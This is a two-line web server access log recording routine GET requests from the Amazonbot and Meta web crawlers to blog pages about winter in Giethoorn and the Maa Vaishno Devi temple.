52.0.105.244 - - [19/Oct/2025:12:05:51 -0400] "GET /tag/giethoorn-winter/ HTTP/1.1" 200 122232 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
57.141.0.22 - - [19/Oct/2025:12:05:59 -0400] "GET /these-miraculous-mysteries-of-maa-vaishno-devi-temple-to-amaze-you/ HTTP/1.1" 200 285552 "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
